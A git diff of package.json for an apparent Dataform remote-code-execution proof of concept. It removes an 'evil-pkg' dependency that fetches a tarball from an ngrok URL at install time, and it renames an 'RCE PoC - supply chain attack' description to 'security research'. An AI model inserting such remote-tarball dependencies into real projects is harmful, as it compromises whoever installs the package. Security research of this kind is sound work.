--- a/package.json
+++ b/package.json
@@ -1,9 +1,8 @@
 {
   "name": "dataform-vuln-poc",
   "version": "1.0.0",
-  "description": "Dataform RCE PoC - supply chain attack via tarball URL",
+  "description": "Dataform V8 security research",
   "dependencies": {
-    "@dataform/core": "^2.9.0",
-    "evil-pkg": "https://b085ce372309.ngrok-free.app/evil-package.tgz"
+    "@dataform/core": "^2.9.0"
   }
 }
